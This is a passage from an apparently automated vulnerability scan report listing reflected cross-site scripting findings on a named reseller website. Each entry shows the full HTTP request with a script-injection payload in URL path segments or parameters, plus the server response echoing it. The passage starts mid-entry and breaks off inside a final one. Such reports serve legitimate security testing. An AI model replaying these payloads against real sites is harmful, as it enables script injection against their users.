GET /communication/themes/kosmos68a9a<script>alert(1)</script>4ea16b489b7/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos68a9a<script>alert(1)</script>4ea16b489b7/images/review/ was not found on this server.</p>
...[SNIP]...

2.760. http://www.resellerbase.com/communication/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 359c4<script>alert(1)</script>1857e69c338 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images359c4<script>alert(1)</script>1857e69c338/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images359c4<script>alert(1)</script>1857e69c338/review/ was not found on this server.</p>
...[SNIP]...

2.761. http://www.resellerbase.com/communication/themes/kosmos/images/review/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 12cbc<script>alert(1)</script>7ee53d93fbf was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/review12cbc<script>alert(1)</script>7ee53d93fbf/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review12cbc<script>alert(1)</script>7ee53d93fbf/ was not found on this server.</p>
...[SNIP]...

2.762. http://www.resellerbase.com/communication/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1bb77<script>alert(1)</script>4bc6454923d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/review/?1bb77<script>alert(1)</script>4bc6454923d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review/?1bb77<script>alert(1)</script>4bc6454923d=1 was not found on this server.</p>
...[SNIP]...

2.763. http://www.resellerbase.com/communication/themes/kosmos/images/review/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 65ec9<script>alert(1)</script>c6da4a30542 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication65ec9<script>alert(1)</script>c6da4a30542/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication65ec9<script>alert(1)</script>c6da4a30542/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.764. http://www.resellerbase.com/communication/themes/kosmos/images/review/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7df9f<script>alert(1)</script>a65d63c2c70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes7df9f<script>alert(1)</script>a65d63c2c70/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes7df9f<script>alert(1)</script>a65d63c2c70/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.765. http://www.resellerbase.com/communication/themes/kosmos/images/review/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ee058<script>alert(1)</script>f31599738a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmosee058<script>alert(1)</script>f31599738a2/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmosee058<script>alert(1)</script>f31599738a2/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.766. http://www.resellerbase.com/communication/themes/kosmos/images/review/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 58a95<script>alert(1)</script>867dbcef982 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images58a95<script>alert(1)</script>867dbcef982/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images58a95<script>alert(1)</script>867dbcef982/review/0.gif was not found on this server.</p>
...[SNIP]...

2.767. http://www.resellerbase.com/communication/themes/kosmos/images/review/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d1ba2<script>alert(1)</script>3f6f5fd2e90 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/reviewd1ba2<script>alert(1)</script>3f6f5fd2e90/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/reviewd1ba2<script>alert(1)</script>3f6f5fd2e90/0.gif was not found on this server.</p>
...[SNIP]...

2.768. http://www.resellerbase.com/communication/themes/kosmos/images/review/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 429c6<script>alert(1)</script>a5270fc251a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/review/0.gif429c6<script>alert(1)</script>a5270fc251a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review/0.gif429c6<script>alert(1)</script>a5270fc251a was not found on this server.</p>
...[SNIP]...

2.769. http://www.resellerbase.com/communication/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload eaeec<script>alert(1)</script>ef4ab8d018a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/review/0.gif?eaeec<script>alert(1)</script>ef4ab8d018a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review/0.gif?eaeec<script>alert(1)</script>ef4ab8d018a=1 was not found on this server.</p>
...[SNIP]...

2.770. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4029e<script>alert(1)</script>b01d3ebb38c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication4029e<script>alert(1)</script>b01d3ebb38c/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication4029e<script>alert(1)</script>b01d3ebb38c/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.771. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3b675<script>alert(1)</script>fcfdea2a9ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes3b675<script>alert(1)</script>fcfdea2a9ef/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes3b675<script>alert(1)</script>fcfdea2a9ef/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.772. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9bb1a<script>alert(1)</script>58de3616c9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos9bb1a<script>alert(1)</script>58de3616c9d/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos9bb1a<script>alert(1)</script>58de3616c9d/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.773. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 37037<script>alert(1)</script>a0b6303aca0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images37037<script>alert(1)</script>a0b6303aca0/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images37037<script>alert(1)</script>a0b6303aca0/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.774. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload faa82<script>alert(1)</script>af5496e46c4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/reviewfaa82<script>alert(1)</script>af5496e46c4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/reviewfaa82<script>alert(1)</script>af5496e46c4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.775. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2a163<script>alert(1)</script>b545a1cbcd2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/review/search.php2a163<script>alert(1)</script>b545a1cbcd2?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review/search.php2a163<script>alert(1)</script>b545a1cbcd2?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.776. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 208d1<a>1971302d5c4 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search208d1<a>1971302d5c4&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search208d1<a>1971302d5c4&opt=2 was not found on this server.</p>
...[SNIP]...

2.777. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c3ba2<a>1fae1dfefd4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/review/search.php?keyword=search...c3ba2<a>1fae1dfefd4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review/search.php?keyword=search...c3ba2<a>1fae1dfefd4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.778. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/search.php

Issue detail

